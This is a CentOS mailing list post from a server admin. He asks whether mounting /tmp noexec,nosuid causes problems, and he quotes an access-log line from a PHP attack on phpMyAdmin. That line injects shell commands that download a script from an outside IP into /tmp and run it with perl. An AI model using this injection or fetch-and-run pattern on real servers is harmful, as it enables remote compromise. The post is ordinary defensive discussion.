Does mounting /tmp as noexec,nosuid break anything in CentOS 5? I've been in solaris land forever and a day and this is a pretty standard security measure. I noticed CentOS comes default mounting /tmp with both those options allowed.. I'm getting constant php hack attacks against (mostly script kiddie level stuff right now) my server and will rest much easier with this setting in place.. We've been evaluating numerous wiki products which are certain to have security holes as well as pypmyadmin... Seeing a lot of crap like this:
193.253.240.85 - - [23/Aug/2009:16:57:57 -0500] "GET /phpmyadmin/config/config.inc.php?c=cd%20/tmp;rm%20-rf%20font-nix;wget%2078.46.33.52/font-nix;perl%20font-nix HTTP/1.1" 404 230
(of course I use cryptic names for my phpmyadmin install directory as well as password protect the directory and make any sensitive config files readable only by the web server owner)
Thx for any info
rhugga
_______________________________________________ CentOS mailing list CentOS@xxxxxxxxxx http://lists.centos.org/mailman/listinfo/centos